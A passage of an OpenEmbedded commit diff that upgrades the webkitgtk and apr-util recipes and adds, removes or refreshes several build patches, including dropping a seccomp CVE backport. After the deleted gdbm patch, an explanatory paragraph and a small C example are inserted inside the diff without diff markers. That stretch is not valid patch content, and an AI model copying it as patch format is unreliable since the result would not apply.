+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ Tools/MiniBrowser/gtk/CMakeLists.txt | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Tools/MiniBrowser/gtk/CMakeLists.txt b/Tools/MiniBrowser/gtk/CMakeLists.txt
+index 93b62521..482d3b00 100644
+--- a/Tools/MiniBrowser/gtk/CMakeLists.txt
++++ b/Tools/MiniBrowser/gtk/CMakeLists.txt
+@@ -48,8 +48,8 @@ add_custom_command(
+ OUTPUT ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
+ ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
+ MAIN_DEPENDENCY ${MINIBROWSER_DIR}/browser-marshal.list
+- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
+- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
+ VERBATIM)
+
+ if (DEVELOPER_MODE)
+--
+2.31.1
+
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
new file mode 100644
index 0000000000..d8bb8efb88
--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
@@ -0,0 +1,66 @@
+From cb929f59b527fe890376e47613dfe1434a320bc0 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Tue, 11 Aug 2020 15:44:48 -0700
+Subject: [PATCH] [clang 11] fix build errors due to -WWc++11-narrowing
+
+https://bugs.webkit.org/show_bug.cgi?id=211193
+
+Reviewed by Adrian Perez de Castro.
+
+Fixes the following errors,
+
+Source/WebCore/html/MediaElementSession.cpp:1059:9: error: type 'WebCore::RenderMedia *' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
+m_element.renderer(),
+^~~~~~~~~~~~~~~~~~~~
+
+Source/WebCore/style/StyleResolver.cpp:106:55: error: type 'const char [4]' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
+m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
+ ^~~~~
+Source/WebCore/style/StyleResolver.cpp:106:55: note: insert an explicit cast to silence this issue
+m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
+ ^~~~~
+ static_cast<bool>( )
+
+* html/HTMLMediaElement.h:
+(WebCore::HTMLMediaElement::hasRenderer const):
+MediaElementSession was implicitly casting a pointer to a bool,
+which is not allowed with modern Clang checks. Add a helper method
+to encapsulate the now required static_cast<bool>.
+* html/MediaElementSession.cpp: Use the new helper method to see
+if the HTMLMediaElement has an associated renderer.
+(WebCore::MediaElementSession::updateMediaUsageIfChanged):
+* style/StyleResolver.cpp: This was calling MediaQueryEvaluator {
+"all" }; and seemingly expecting to cast a const char[] to a bool,
+or maybe String? It's confusing because of the MediaQueryEvaluator
+API. If it was implicitly converting to bool then that could be
+unintentional. Such casts are not allowed either now. The
+MediaQueryEvaluator's default constructor says it returns true for
+"all", which appears to be the original intent of this call, so I
+replaced it with that.
+(WebCore::Style::Resolver::Resolver):
+
+git-svn-id: http://svn.webkit.org/repository/webkit/trunk@260951 268f45cc-cd09-0410-ab3c-d52691b4dbfc
+
+Upstream-Status: Backport [https://github.com/WebKit/webkit/commit/c3cf651016e4cdcb4350598d4a586821071f91bf.patch]
+
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ Source/WebCore/style/StyleResolver.cpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Source/WebCore/style/StyleResolver.cpp b/Source/WebCore/style/StyleResolver.cpp
+index 8bf371a0..34580ddb 100644
+--- a/Source/WebCore/style/StyleResolver.cpp
++++ b/Source/WebCore/style/StyleResolver.cpp
+@@ -107,7 +107,7 @@ Resolver::Resolver(Document& document)
+ if (view)
+ m_mediaQueryEvaluator = MediaQueryEvaluator { view->mediaType() };
+ else
+- m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
++ m_mediaQueryEvaluator = MediaQueryEvaluator { };
+
+ if (root) {
+ m_rootDefaultStyle = styleForElement(*root, m_document.renderStyle(), nullptr, RuleMatchingBehavior::MatchOnlyUserAgentRules).renderStyle;
+--
+2.28.0
+
diff --git a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch b/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
deleted file mode 100644
index d8504c2b36..0000000000
--- a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
+++ /dev/null
@@ -1,15 +0,0 @@
-Upstream-Status: Backport [https://trac.webkit.org/changeset/262368/webkit?format=diff&new=262368]
-CVE: CVE-2020-13753
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
-
-Index: a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp
-===================================================================
---- a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp (revision 262367)
-+++ b/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp (revision 262368)
-@@ -642,5 +642,5 @@
- int r;
- if (rule.arg)
-- r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, rule.arg);
-+ r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, *rule.arg);
- else
- r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 0);
diff --git a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
index 9cfec83ec7..2e3f0aa682 100644
--- a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb
+++ b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
@@ -19,10 +19,10 @@ SRC_URI = "https://www.webkitgtk.org/releases/${BPN}-${PV}.tar.xz \
file://cross-compile.patch \
file://0001-Fix-build-with-musl.patch \
file://include_array.patch \
- file://CVE-2020-13753.patch \
+ file://0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch \
+ file://0001-MiniBrowser-Fix-reproduciblity.patch \
"
-SRC_URI[md5sum] = "ec0ef870ca37e3a5ebbead2f268a28ec"
-SRC_URI[sha256sum] = "b9d23525cfd8d22c37b5d964a9fe9a8ce7583042a2f8d3922e71e6bbc68c30bd"
+SRC_URI[sha256sum] = "821952e8c9303ed752f1fb1d4283f612c25249d00d705d2b79c2db1bc49c9464"
inherit cmake pkgconfig gobject-introspection perlnative features_check upstream-version-is-even gtk-doc
@@ -131,3 +131,15 @@ GI_DATA_ENABLED_libc-musl_armv7ve = "False"
# Can't be built with ccache
CCACHE_DISABLE = "1"
+
+PACKAGE_PREPROCESS_FUNCS += "src_package_preprocess"
+src_package_preprocess () {
+ # Trim build paths from comments in generated sources to ensure reproducibility
+ sed -i -e "s,${WORKDIR},,g" \
+ ${B}/DerivedSources/webkit2gtk/webkit2/*.cpp \
+ ${B}/DerivedSources/ForwardingHeaders/JavaScriptCore/*.h \
+ ${B}/DerivedSources/JavaScriptCore/*.h \
+ ${B}/DerivedSources/JavaScriptCore/yarr/*.h \
+ ${B}/DerivedSources/MiniBrowser/*.c
+}
+
diff --git a/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb b/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
index cd2f7fabda..165fc74dde 100644
--- a/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
+++ b/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
@@ -15,3 +15,6 @@ REQUIRED_DISTRO_FEATURES = "opengl"
SRC_URI = "https://wpewebkit.org/releases/${BPN}-${PV}.tar.xz"
SRC_URI[sha256sum] = "6249a0b7cbfa662206a8d2fa24e2c574e75c681ad0e93468091f1dc68ddb299d"
+FILES_${PN} += "${libdir}/libWPEBackend-fdo-1.0.so"
+FILES_SOLIBSDEV = ""
+INSANE_SKIP_${PN} += "dev-so"
diff --git a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch b/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
deleted file mode 100644
index 57e7453312..0000000000
--- a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
+++ /dev/null
@@ -1,135 +0,0 @@
-From 6b638fa9afbeb54dfa19378e391465a5284ce1ad Mon Sep 17 00:00:00 2001
-From: Changqing Li <changqing.li@windriver.com>
-Date: Wed, 12 Sep 2018 17:16:36 +0800
-Subject: [PATCH] Fix error handling in gdbm
-
-Only check for gdbm_errno if the return value of the called gdbm_*
-function says so. This fixes apr-util with gdbm 1.14, which does not
-seem to always reset gdbm_errno.
-
-Also make the gdbm driver return error codes starting with
-APR_OS_START_USEERR instead of always returning APR_EGENERAL. This is
-what the berkleydb driver already does.
-
-Also ensure that dsize is 0 if dptr == NULL.
-
-Upstream-Status: Backport[https://svn.apache.org/viewvc?
-view=revision&amp;revision=1825311]
-
-Signed-off-by: Changqing Li <changqing.li@windriver.com>
----
- dbm/apr_dbm_gdbm.c | 47 +++++++++++++++++++++++++++++------------------
- 1 file changed, 29 insertions(+), 18 deletions(-)
-
-diff --git a/dbm/apr_dbm_gdbm.c b/dbm/apr_dbm_gdbm.c
-index 749447a..1c86327 100644
---- a/dbm/apr_dbm_gdbm.c
-+++ b/dbm/apr_dbm_gdbm.c
-@@ -36,13 +36,25 @@
- static apr_status_t g2s(int gerr)
- {
- if (gerr == -1) {
-- /* ### need to fix this */
-- return APR_EGENERAL;
-+ if (gdbm_errno == GDBM_NO_ERROR)
-+ return APR_SUCCESS;
-+ return APR_OS_START_USEERR + gdbm_errno;
- }
-
- return APR_SUCCESS;
- }
-
-+static apr_status_t gdat2s(datum d)
-+{
-+ if (d.dptr == NULL) {
-+ if (gdbm_errno == GDBM_NO_ERROR || gdbm_errno == GDBM_ITEM_NOT_FOUND)
-+ return APR_SUCCESS;
-+ return APR_OS_START_USEERR + gdbm_errno;
-+ }
-+
-+ return APR_SUCCESS;
-+}
-+
- static apr_status_t datum_cleanup(void *dptr)
- {
- if (dptr)
-@@ -53,22 +65,15 @@ static apr_status_t datum_cleanup(void *dptr)
-
- static apr_status_t set_error(apr_dbm_t *dbm, apr_status_t dbm_said)
- {
-- apr_status_t rv = APR_SUCCESS;
-
-- /* ### ignore whatever the DBM said (dbm_said); ask it explicitly */
-+ dbm->errcode = dbm_said;
-
-- if ((dbm->errcode = gdbm_errno) == GDBM_NO_ERROR) {
-+ if (dbm_said == APR_SUCCESS)
- dbm->errmsg = NULL;
-- }
-- else {
-- dbm->errmsg = gdbm_strerror(gdbm_errno);
-- rv = APR_EGENERAL; /* ### need something better */
-- }
--
-- /* captured it. clear it now. */
-- gdbm_errno = GDBM_NO_ERROR;
-+ else
-+ dbm->errmsg = gdbm_strerror(dbm_said - APR_OS_START_USEERR);
-
-- return rv;
-+ return dbm_said;
- }
-
- /* --------------------------------------------------------------------------
-@@ -107,7 +112,7 @@ static apr_status_t vt_gdbm_open(apr_dbm_t **pdb, const char *pathname,
- NULL);
-
- if (file == NULL)
-- return APR_EGENERAL; /* ### need a better error */
-+ return APR_OS_START_USEERR + gdbm_errno; /* ### need a better error */
-
- /* we have an open database... return it */
- *pdb = apr_pcalloc(pool, sizeof(**pdb));
-@@ -141,10 +146,12 @@ static apr_status_t vt_gdbm_fetch(apr_dbm_t *dbm, apr_datum_t key,
- if (pvalue->dptr)
- apr_pool_cleanup_register(dbm->pool, pvalue->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pvalue->dsize = 0;
-
- /* store the error info into DBM, and return a status code. Also, note
- that *pvalue should have been cleared on error. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static apr_status_t vt_gdbm_store(apr_dbm_t *dbm, apr_datum_t key,
-@@ -201,9 +208,11 @@ static apr_status_t vt_gdbm_firstkey(apr_dbm_t *dbm, apr_datum_t *pkey)
- if (pkey->dptr)
- apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pkey->dsize = 0;
-
- /* store any error info into DBM, and return a status code. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
-@@ -221,9 +230,11 @@ static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
- if (pkey->dptr)
- apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pkey->dsize = 0;
-
- /* store any error info into DBM, and return a status code. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static void vt_gdbm_freedatum(apr_dbm_t *dbm, apr_datum_t data)
---
-2.7.4
-
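The backport deleted above (dropped presumably because the fix is already upstream in the 1.6.3 release that the next hunks upgrade to) illustrates a general wrapping pattern: rather than collapsing every library failure to one generic status such as APR_EGENERAL, the library's own error number is shifted into a reserved status range so the original cause stays recoverable. A minimal standalone sketch of that pattern follows; MY_USERERR_BASE, db_to_status and the DB_* codes are invented names that only mimic the APR_OS_START_USEERR + gdbm_errno scheme.

#include <stdio.h>

#define MY_SUCCESS       0
#define MY_USERERR_BASE  20000   /* analogous to APR_OS_START_USEERR */

/* Pretend library error codes (standing in for gdbm_errno values). */
enum { DB_NO_ERROR = 0, DB_ITEM_NOT_FOUND = 9, DB_IO_ERROR = 17 };

static int db_to_status(int db_errno) {
    if (db_errno == DB_NO_ERROR || db_errno == DB_ITEM_NOT_FOUND)
        return MY_SUCCESS;
    return MY_USERERR_BASE + db_errno;   /* keep the original code recoverable */
}

static const char* status_to_message(int status) {
    switch (status - MY_USERERR_BASE) {  /* undo the shift to find the cause */
        case DB_IO_ERROR: return "I/O error in database layer";
        default:          return "unknown database error";
    }
}

int main(void) {
    const int status = db_to_status(DB_IO_ERROR);
    if (status != MY_SUCCESS)
        printf("status %d: %s\n", status, status_to_message(status));
    return 0;
}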
diff --git a/meta/recipes-support/apr/apr-util_1.6.1.bb b/meta/recipes-support/apr/apr-util_1.6.3.bb
index 0dd8f025e8..3d9d619c7b 100644
--- a/meta/recipes-support/apr/apr-util_1.6.1.bb
+++ b/meta/recipes-support/apr/apr-util_1.6.3.bb
@@ -13,16 +13,13 @@ SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.gz \
file://configfix.patch \
file://configure_fixes.patch \
file://run-ptest \
- file://0001-Fix-error-handling-in-gdbm.patch \
-"
+ "
-SRC_URI[md5sum] = "bd502b9a8670a8012c4d90c31a84955f"
-SRC_URI[sha256sum] = "b65e40713da57d004123b6319828be7f1273fbc6490e145874ee1177e112c459"
+SRC_URI[sha256sum] = "2b74d8932703826862ca305b094eef2983c27b39d5c9414442e9976a9acf1983"
-EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \
+EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \
--without-odbc \
--without-pgsql \
- --with-dbm=gdbm \
--without-sqlite2 \
--with-expat=${STAGING_DIR_HOST}${prefix}"
@@ -36,6 +33,7 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
do_configure_append() {
if [ "${CLASSOVERRIDE}" = "class-target" ]; then
cp ${STAGING_DATADIR}/apr/apr_rules.mk ${B}/build/rules.mk
+ sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${B}/build/rules.mk
fi
}
do_configure_prepend_class-native() {
@@ -50,6 +48,7 @@ do_configure_append_class-native() {
do_configure_prepend_class-nativesdk() {
cp ${STAGING_DATADIR}/apr/apr_rules.mk ${S}/build/rules.mk
+ sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${S}/build/rules.mk
}
do_configure_append_class-nativesdk() {
@@ -69,7 +68,7 @@ PACKAGECONFIG ??= "crypto gdbm"
PACKAGECONFIG[ldap] = "--with-ldap,--without-ldap,openldap"
PACKAGECONFIG[crypto] = "--with-openssl=${STAGING_DIR_HOST}${prefix} --with-crypto,--without-crypto,openssl"
PACKAGECONFIG[sqlite3] = "--with-sqlite3=${STAGING_DIR_HOST}${prefix},--without-sqlite3,sqlite3"
-PACKAGECONFIG[gdbm] = "--with-gdbm=${STAGING_DIR_HOST}${prefix},--without-gdbm,gdbm"
+PACKAGECONFIG[gdbm] = "--with-dbm=gdbm --with-gdbm=${STAGING_DIR_HOST}${prefix},--without-gdbm,gdbm"
#files ${libdir}/apr-util-1/*.so are not symlinks but loadable modules thus they are packaged in ${PN}
FILES_${PN} += "${libdir}/apr-util-1/apr*${SOLIBS} ${libdir}/apr-util-1/apr*${SOLIBSDEV}"
diff --git a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
index abff4e9331..a274f3a16e 100644
--- a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
+++ b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
@@ -1,14 +1,15 @@
-From 2bbe20b4f69e84e7a18bc79d382486953f479328 Mon Sep 17 00:00:00 2001
+From 225abf37cd0b49960664b59f08e515a4c4ea5ad0 Mon Sep 17 00:00:00 2001
From: Jeremy Puhlman <jpuhlman@mvista.com>
Date: Thu, 26 Mar 2020 18:30:36 +0000
Subject: [PATCH] Add option to disable timed dependant tests
-The disabled tests rely on timing to pass correctly. On a virtualized
+The disabled tests rely on timing to pass correctly. On a virtualized
system under heavy load, these tests randomly fail because they miss
a timer or other timing related issues.
Upstream-Status: Pending
Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
+
---
configure.in | 6 ++++++
include/apr.h.in | 1 +
@@ -16,10 +17,10 @@ Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
3 files changed, 9 insertions(+), 2 deletions(-)
diff --git a/configure.in b/configure.in
-index d9f32d6..f0c5661 100644
+index bfd488b..3663220 100644
--- a/configure.in
+++ b/configure.in
-@@ -2886,6 +2886,12 @@ AC_ARG_ENABLE(timedlocks,
+@@ -3023,6 +3023,12 @@ AC_ARG_ENABLE(timedlocks,
)
AC_SUBST(apr_has_timedlocks)
@@ -45,10 +46,10 @@ index ee99def..c46a5f4 100644
#define APR_PROCATTR_USER_SET_REQUIRES_PASSWORD @apr_procattr_user_set_requires_password@
diff --git a/test/testlock.c b/test/testlock.c
-index a43f477..6233d0b 100644
+index e3437c1..04e01b9 100644
--- a/test/testlock.c
+++ b/test/testlock.c
-@@ -396,13 +396,13 @@ abts_suite *testlock(abts_suite *suite)
+@@ -535,7 +535,7 @@ abts_suite *testlock(abts_suite *suite)
abts_run_test(suite, threads_not_impl, NULL);
#else
abts_run_test(suite, test_thread_mutex, NULL);
@@ -56,6 +57,8 @@ index a43f477..6233d0b 100644
+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
abts_run_test(suite, test_thread_timedmutex, NULL);
#endif
+ abts_run_test(suite, test_thread_nestedmutex, NULL);
+@@ -543,7 +543,7 @@ abts_suite *testlock(abts_suite *suite)
abts_run_test(suite, test_thread_rwlock, NULL);
abts_run_test(suite, test_cond, NULL);
abts_run_test(suite, test_timeoutcond, NULL);
@@ -63,7 +66,4 @@ index a43f477..6233d0b 100644
+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
abts_run_test(suite, test_timeoutmutex, NULL);
#endif
- #endif
---
-2.23.0
-
+ #ifdef WIN32
diff --git a/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
new file mode 100644
index 0000000000..a78b16284f
--- /dev/null
+++ b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
@@ -0,0 +1,58 @@
+From 316b81c462f065927d7fec56aadd5c8cb94d1cf0 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 26 Aug 2022 00:28:08 -0700
+Subject: [PATCH] configure: Remove runtime test for mmap that can map
+ /dev/zero
+
+This never works for cross-compile moreover it ends up disabling
+ac_cv_file__dev_zero which then results in compiler errors in shared
+mutexes
+
+Upstream-Status: Inappropriate [Cross-compile specific]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+
+---
+ configure.in | 30 ------------------------------
+ 1 file changed, 30 deletions(-)
+
+diff --git a/configure.in b/configure.in
+index 3663220..dce9789 100644
+--- a/configure.in
++++ b/configure.in
+@@ -1303,36 +1303,6 @@ AC_CHECK_FUNCS([mmap munmap shm_open shm_unlink shmget shmat shmdt shmctl \
+ APR_CHECK_DEFINE(MAP_ANON, sys/mman.h)
+ AC_CHECK_FILE(/dev/zero)
+
+-# Not all systems can mmap /dev/zero (such as HP-UX). Check for that.
+-if test "$ac_cv_func_mmap" = "yes" &&
+- test "$ac_cv_file__dev_zero" = "yes"; then
+- AC_CACHE_CHECK([for mmap that can map /dev/zero],
+- [ac_cv_mmap__dev_zero],
+- [AC_TRY_RUN([#include <sys/types.h>
+-#include <sys/stat.h>
+-#include <fcntl.h>
+-#ifdef HAVE_SYS_MMAN_H
+-#include <sys/mman.h>
+-#endif
+- int main()
+- {
+- int fd;
+- void *m;
+- fd = open("/dev/zero", O_RDWR);
+- if (fd < 0) {
+- return 1;
+- }
+- m = mmap(0, sizeof(void*), PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
+- if (m == (void *)-1) { /* aka MAP_FAILED */
+- return 2;
+- }
+- if (munmap(m, sizeof(void*)) < 0) {
+- return 3;
+- }
+- return 0;
+- }], [], [ac_cv_file__dev_zero=no], [ac_cv_file__dev_zero=no])])
+-fi
+-
+ # Now we determine which one is our anonymous shmem preference.
+ haveshmgetanon="0"
+ havemmapzero="0"
diff --git a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
index 72e706f966..d63423f3a1 100644
--- a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
+++ b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
@@ -1,8 +1,7 @@
-From 5925b20da8bbc34d9bf5a5dca123ef38864d43c6 Mon Sep 17 00:00:00 2001
+From 689a8db96a6d1e1cae9cbfb35d05ac82140a6555 Mon Sep 17 00:00:00 2001
From: Hongxu Jia <hongxu.jia@windriver.com>
Date: Tue, 30 Jan 2018 09:39:06 +0800
-Subject: [PATCH 2/7] apr: Remove workdir path references from installed apr
- files
+Subject: [PATCH] apr: Remove workdir path references from installed apr files
Upstream-Status: Inappropriate [configuration]
@@ -14,20 +13,23 @@ packages at target run time, the workdir path caused confusion.
Rebase to 1.6.3
Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+
---
- apr-config.in | 26 ++------------------------
- 1 file changed, 2 insertions(+), 24 deletions(-)
+ apr-config.in | 32 ++------------------------------
+ 1 file changed, 2 insertions(+), 30 deletions(-)
diff --git a/apr-config.in b/apr-config.in
-index 84b4073..bbbf651 100644
+index bed47ca..47874e5 100644
--- a/apr-config.in
+++ b/apr-config.in
-@@ -152,14 +152,7 @@ while test $# -gt 0; do
+@@ -164,16 +164,7 @@ while test $# -gt 0; do
flags="$flags $LDFLAGS"
;;
--includes)
- if test "$location" = "installed"; then
flags="$flags -I$includedir $EXTRA_INCLUDES"
+- elif test "$location" = "crosscompile"; then
+- flags="$flags -I$APR_TARGET_DIR/$includedir $EXTRA_INCLUDES"
- elif test "$location" = "source"; then
- flags="$flags -I$APR_SOURCE_DIR/include $EXTRA_INCLUDES"
- else
@@ -37,13 +39,15 @@ index 84b4073..bbbf651 100644
;;
--srcdir)
echo $APR_SOURCE_DIR
-@@ -181,29 +174,14 @@ while test $# -gt 0; do
+@@ -197,33 +188,14 @@ while test $# -gt 0; do
exit 0
;;
--link-ld)
- if test "$location" = "installed"; then
- ### avoid using -L if libdir is a "standard" location like /usr/lib
- flags="$flags -L$libdir -l${APR_LIBNAME}"
+- elif test "$location" = "crosscompile"; then
+- flags="$flags -L$APR_TARGET_DIR/$libdir -l${APR_LIBNAME}"
- else
- ### this surely can't work since the library is in .libs?
- flags="$flags -L$APR_BUILD_DIR -l${APR_LIBNAME}"
@@ -62,6 +66,8 @@ index 84b4073..bbbf651 100644
- # Since the user is specifying they are linking with libtool, we
- # *know* that -R will be recognized by libtool.
- flags="$flags -L$libdir -R$libdir -l${APR_LIBNAME}"
+- elif test "$location" = "crosscompile"; then
+- flags="$flags -L${APR_TARGET_DIR}/$libdir -l${APR_LIBNAME}"
- else
- flags="$flags $LA_FILE"
- fi
@@ -69,6 +75,3 @@ index 84b4073..bbbf651 100644
;;
--shlib-path-var)
echo "$SHLIBPATH_VAR"
---
-1.8.3.1
-
diff --git a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch b/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
deleted file mode 100644
index 4dd53bd8eb..0000000000
--- a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From d5028c10f156c224475b340cfb1ba025d6797243 Mon Sep 17 00:00:00 2001
-From: Hongxu Jia <hongxu.jia@windriver.com>
-Date: Fri, 2 Feb 2018 15:51:42 +0800
-Subject: [PATCH 3/7] Makefile.in/configure.in: support cross compiling
-
-While cross compiling, the tools/gen_test_char could not
-be executed at build time, use AX_PROG_CC_FOR_BUILD to
-build native tools/gen_test_char
-
-Upstream-Status: Submitted [https://github.com/apache/apr/pull/8]
-
-Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
----
- Makefile.in | 10 +++-------
- configure.in | 3 +++
- 2 files changed, 6 insertions(+), 7 deletions(-)
-
-diff --git a/Makefile.in b/Makefile.in
-index 5fb760e..8675f90 100644
---- a/Makefile.in
-+++ b/Makefile.in
-@@ -46,7 +46,7 @@ LT_VERSION = @LT_VERSION@
-
- CLEAN_TARGETS = apr-config.out apr.exp exports.c export_vars.c .make.dirs \
- build/apr_rules.out tools/gen_test_char@EXEEXT@ \
-- tools/gen_test_char.o tools/gen_test_char.lo \
-+ tools/gen_test_char.o \
- include/private/apr_escape_test_char.h
- DISTCLEAN_TARGETS = config.cache config.log config.status \
- include/apr.h include/arch/unix/apr_private.h \
-@@ -131,13 +131,9 @@ check: $(TARGET_LIB)
- etags:
- etags `find . -name '*.[ch]'`
-
--OBJECTS_gen_test_char = tools/gen_test_char.lo $(LOCAL_LIBS)
--tools/gen_test_char.lo: tools/gen_test_char.c
-+tools/gen_test_char@EXEEXT@: tools/gen_test_char.c
- $(APR_MKDIR) tools
-- $(LT_COMPILE)
--
--tools/gen_test_char@EXEEXT@: $(OBJECTS_gen_test_char)
-- $(LINK_PROG) $(OBJECTS_gen_test_char) $(ALL_LIBS)
-+ $(CC_FOR_BUILD) $(CFLAGS_FOR_BUILD) $< -o $@
-
- include/private/apr_escape_test_char.h: tools/gen_test_char@EXEEXT@
- $(APR_MKDIR) include/private
-diff --git a/configure.in b/configure.in
-index 719f331..361120f 100644
---- a/configure.in
-+++ b/configure.in
-@@ -183,6 +183,9 @@ dnl can only be used once within a configure script, so this prevents a
- dnl preload section from invoking the macro to get compiler info.
- AC_PROG_CC
-
-+dnl Check build CC for gen_test_char compiling which is executed at build time.
-+AX_PROG_CC_FOR_BUILD
-+
- dnl AC_PROG_SED is only avaliable in recent autoconf versions.
- dnl Use AC_CHECK_PROG instead if AC_PROG_SED is not present.
- ifdef([AC_PROG_SED],
---
-1.8.3.1
-
diff --git a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch b/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
deleted file mode 100644
index d1a2ebe881..0000000000
--- a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 49661ea3858cf8494926cccf57d3e8c6dcb47117 Mon Sep 17 00:00:00 2001
-From: Dengke Du <dengke.du@windriver.com>
-Date: Wed, 14 Dec 2016 18:13:08 +0800
-Subject: [PATCH] apr: fix off_t size doesn't match in glibc when cross
- compiling
-
-In configure.in, it contains the following:
-
- APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
-
-the macro "APR_CHECK_SIZEOF_EXTENDED" was defined in build/apr_common.m4,
